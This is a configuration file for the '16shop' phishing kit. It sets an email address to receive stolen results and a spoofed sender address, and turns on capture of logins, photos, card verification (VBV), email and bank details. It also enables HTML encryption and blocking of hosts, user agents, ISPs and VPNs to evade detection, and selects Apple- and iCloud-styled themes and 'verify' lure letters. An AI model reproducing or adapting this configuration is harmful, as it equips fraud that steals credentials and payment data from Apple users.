[ YOUR EMAIL ]
email_result= "david1337william@gmail.com"
[ LOCK PLATFORM = "iPhone" "iPad" "iPod" "Mac OS X" "Mac OS 9" ]
lock_platform= ""
[ SENDER MAIL ]
sender_mail= "admin@16digit.shop"
[ www.yourhost.com/?16shop ]
site_param_on= ""
site_parameter= "16shop"
[ OTHER SETTING ]
site_password= "16shop"
site_pass_on= ""
send_login= "on"
mix_result= ""
get_photo= "on"
get_vbv= "on"
get_email= "on"
get_bank= "on"
double_cc= ""

[ BLOCKER AND ENC SETTING ]
onetime= ""
encrypt_html= "on"
block_host= ""
block_ua= ""
block_iprange= ""
block_isp= ""
block_vpn= ""

[ THEME OPTION ]

[ http://16shop.online/admin/assets/images/theme_classic.png ][ clasic ]
[ http://16shop.online/admin/assets/images/theme_icloud.png ][ icloud ]
[ http://16shop.online/admin/assets/images/theme_apple.png ][ apple ]

theme= "clasic"

[ LETTER OPTION ] [ locked ] [ verify ] [ invoice ]
letter= "verify"
mix_email= ""